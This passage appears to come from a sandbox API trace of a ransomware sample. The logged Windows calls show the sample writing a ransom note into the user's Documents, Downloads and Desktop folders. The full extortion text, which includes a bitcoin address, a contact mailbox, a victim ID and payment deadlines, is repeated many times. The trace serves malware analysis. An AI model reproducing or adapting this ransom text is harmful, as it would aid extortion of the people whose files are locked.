\"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x242ff88, cbMultiByte=2498, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", lpUsedDefaultChar=0x0) returned 2498 [0124.522] WriteFile (in: hFile=0x414, lpBuffer=0x242ff88*, nNumberOfBytesToWrite=0x9c2, lpNumberOfBytesWritten=0x19fcac, lpOverlapped=0x0 | out: lpBuffer=0x242ff88*, lpNumberOfBytesWritten=0x19fcac*=0x9c2, lpOverlapped=0x0) returned 1 [0124.524] CloseHandle (hObject=0x414) returned 1 [0124.524] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb3c, csidl=5, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\Documents") returned 1 [0124.524] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0124.524] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb3c, csidl=5, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\Documents") returned 1 [0124.524] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\How Do I Recover My Files (Readme).txt" (normalized: "c:\\users\\fd1hvy\\documents\\how do i recover my files (readme).txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.525] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2498 [0124.525] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2498 [0124.525] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x242ff88, cbMultiByte=2498, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", lpUsedDefaultChar=0x0) returned 2498 [0124.525] WriteFile (in: hFile=0x414, lpBuffer=0x242ff88*, nNumberOfBytesToWrite=0x9c2, lpNumberOfBytesWritten=0x19fcac, lpOverlapped=0x0 | out: lpBuffer=0x242ff88*, lpNumberOfBytesWritten=0x19fcac*=0x9c2, lpOverlapped=0x0) returned 1 [0124.526] CloseHandle (hObject=0x414) returned 1 [0124.526] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x19f530, nSize=0x400 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0124.526] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Downloads\\" (normalized: "c:\\users\\fd1hvy\\downloads")) returned 0x11 [0124.526] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x19f530, nSize=0x400 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0124.526] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Downloads\\How Do I Recover My Files (Readme).txt" (normalized: "c:\\users\\fd1hvy\\downloads\\how do i recover my files (readme).txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.526] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2498 [0124.526] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2498 [0124.527] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x242ff88, cbMultiByte=2498, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", lpUsedDefaultChar=0x0) returned 2498 [0124.527] WriteFile (in: hFile=0x414, lpBuffer=0x242ff88*, nNumberOfBytesToWrite=0x9c2, lpNumberOfBytesWritten=0x19fcac, lpOverlapped=0x0 | out: lpBuffer=0x242ff88*, lpNumberOfBytesWritten=0x19fcac*=0x9c2, lpOverlapped=0x0) returned 1 [0124.528] CloseHandle (hObject=0x414) returned 1 [0124.528] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb3c, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 1 [0124.528] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0124.528] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb3c, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 1 [0124.528] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\How Do I Recover My Files (Readme).txt" (normalized: "c:\\users\\fd1hvy\\desktop\\how do i recover my files (readme).txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.528] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2498 [0124.528] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2498 [0124.528] WideCharToMultiByte 